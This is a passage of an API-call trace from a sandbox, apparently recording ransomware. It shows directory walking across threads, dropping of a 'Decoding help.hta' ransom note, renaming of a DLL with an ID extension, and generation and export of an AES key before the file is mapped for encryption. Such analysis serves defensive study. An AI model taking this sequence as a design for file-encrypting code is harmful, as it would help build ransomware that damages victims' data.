ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0050.227] FindClose (in: hFindFile=0x5d7cd0 | out: hFindFile=0x5d7cd0) returned 1 Thread: id = 628 os_tid = 0xe14 [0048.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*", lpFindFileData=0x1821fd30 | out: lpFindFileData=0x1821fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8010 [0049.304] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.304] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0x1821fd30 | out: lpFindFileData=0x1821fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.304] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.304] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.304] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0x1821fd30 | out: lpFindFileData=0x1821fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0049.304] FindClose (in: hFindFile=0x5d8010 | out: hFindFile=0x5d8010) returned 1 Thread: id = 629 os_tid = 0xe18 [0048.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*", lpFindFileData=0x1855fd30 | out: lpFindFileData=0x1855fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bb0 [0050.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.042] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1855fd30 | out: lpFindFileData=0x1855fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.042] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.042] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1855fd30 | out: lpFindFileData=0x1855fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backup", cAlternateFileName="")) returned 1 [0050.042] lstrcmpW (lpString1=".", lpString2="Backup") returned -1 [0050.042] lstrcmpW (lpString1="..", lpString2="Backup") returned -1 [0050.042] lstrcmpiW (lpString1="windows", lpString2="Backup") returned 1 [0050.258] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*" [0050.258] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned 72 [0050.258] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="Backup" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0050.258] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*.*" [0050.258] GlobalMemoryStatus (in: lpBuffer=0x1855fd10 | out: lpBuffer=0x1855fd10) [0050.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25147988, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x490 [0050.259] CloseHandle (hObject=0x490) returned 1 [0050.259] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1855fd30 | out: lpFindFileData=0x1855fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Updates", cAlternateFileName="")) returned 1 [0050.259] lstrcmpW (lpString1=".", lpString2="Updates") returned -1 [0050.259] lstrcmpW (lpString1="..", lpString2="Updates") returned -1 [0050.259] lstrcmpiW (lpString1="windows", lpString2="Updates") returned 1 [0050.260] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*" [0050.260] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned 72 [0050.260] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="Updates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0050.260] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*.*" [0050.260] GlobalMemoryStatus (in: lpBuffer=0x1855fd10 | out: lpBuffer=0x1855fd10) [0050.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11334308, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x490 [0050.261] CloseHandle (hObject=0x490) returned 1 [0050.261] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1855fd30 | out: lpFindFileData=0x1855fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 1 [0050.261] lstrcmpW (lpString1=".", lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned -1 [0050.261] lstrcmpW (lpString1="..", lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned -1 [0050.261] lstrcmpiW (lpString1="windows", lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 1 [0050.261] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*" [0050.261] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned 72 [0050.261] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0050.261] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*.*" [0050.261] GlobalMemoryStatus (in: lpBuffer=0x1855fd10 | out: lpBuffer=0x1855fd10) [0050.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113ac510, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x490 [0050.263] CloseHandle (hObject=0x490) returned 1 [0050.263] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1855fd30 | out: lpFindFileData=0x1855fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 0 [0050.263] FindClose (in: hFindFile=0x5e2bb0 | out: hFindFile=0x5e2bb0) returned 1 Thread: id = 630 os_tid = 0xe1c [0048.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*", lpFindFileData=0x1875fd30 | out: lpFindFileData=0x1875fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x11231710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11231710, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d86d0 [0052.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0052.277] FindNextFileW (in: hFindFile=0x5d86d0, lpFindFileData=0x1875fd30 | out: lpFindFileData=0x1875fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x11231710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11231710, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.277] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0052.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0052.277] FindNextFileW (in: hFindFile=0x5d86d0, lpFindFileData=0x1875fd30 | out: lpFindFileData=0x1875fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf09b00, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x11231710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4bf09b00, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x2b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTAClientPkgUI.dll", cAlternateFileName="VSTACL~1.DLL")) returned 1 [0052.277] lstrcpyW (in: lpString1=0x671fd8, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*" [0052.277] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*") returned 70 [0052.277] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\Decoding help.hta" [0052.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\decoding help.hta")) returned 0xffffffff [0052.277] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7c0 [0053.813] WriteFile (in: hFile=0x7c0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1875fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1875fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.930] CloseHandle (hObject=0x7c0) returned 1 [0058.433] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.433] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VSTAClientPkgUI.dll") returned -1 [0058.433] lstrlenW (lpString="VSTAClientPkgUI.dll") returned 19 [0058.433] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*" [0058.433] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*.*") returned 70 [0058.433] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\", lpString2="VSTAClientPkgUI.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll" [0058.433] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll" [0058.433] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.434] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc50 [0058.434] CreateFileMappingA (hFile=0xc50, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc54 [0058.434] CryptAcquireContextA (in: phProv=0x1875fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1875fcec*=0x2aac63b8) returned 1 [0060.217] CryptGenKey (in: hProv=0x2aac63b8, Algid=0x6610, dwFlags=0x1, phKey=0x1875fce8 | out: phKey=0x1875fce8*=0x5fca860) returned 1 [0060.217] CryptExportKey (in: hKey=0x5fca860, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1875fbe4, pdwDataLen=0x1875fce4 | out: pbData=0x1875fbe4*, pdwDataLen=0x1875fce4*=0x2c) returned 1 [0060.217] MapViewOfFile (hFileMappingObject=0xc54, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2b60) returned 0x6d90000 Thread: id = 631 os_tid = 0xe20 [0048.873] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*.*", lpFindFileData=0x18a5fd30 | out: lpFindFileData=0x18a5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bf0 [0050.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.042] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0x18a5fd30 | out: lpFindFileData=0x18a5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.042] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.043] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0x18a5fd30 | out: lpFindFileData=0x18a5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0050.043] FindClose (in: hFindFile=0x5e2bf0 | out: hFindFile=0x5e2bf0) returned 1 Thread: id = 632 os_tid = 0xe24 [0048.882] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*.*", lpFindFileData=0xcf4fd30 | out: lpFindFileData=0xcf4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bf0 [0050.043] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.043] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xcf4fd30 | out: lpFindFileData=0xcf4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.043] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.043] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.043] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xcf4fd30 | out: lpFindFileData=0xcf4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0050.043] FindClose (in: hFindFile=0x5e2bf0 | out: hFindFile=0x5e2bf0) returned 1 Thread: id = 633 os_tid = 0xe28 [0048.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*", lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b50 [0050.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.417] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.417] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.417] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.417] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x504fd30 | out: lpFindFileData=0x504fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActivityLog", cAlternateFileName="ACTIVI~1")) returned 1 [0050.417] lstrcmpW (lpString1=".", lpString2="ActivityLog") returned -1 [0050.417] lstrcmpW (lpString1="..", lpString2="ActivityLog") returned -1 [0050.417] lstrcmpiW (lpString1="windows", lpString2="ActivityLog") returned 1 [0050.417] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*" [0050.418] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*.*") returned 53 [0050.418] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="ActivityLog" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") 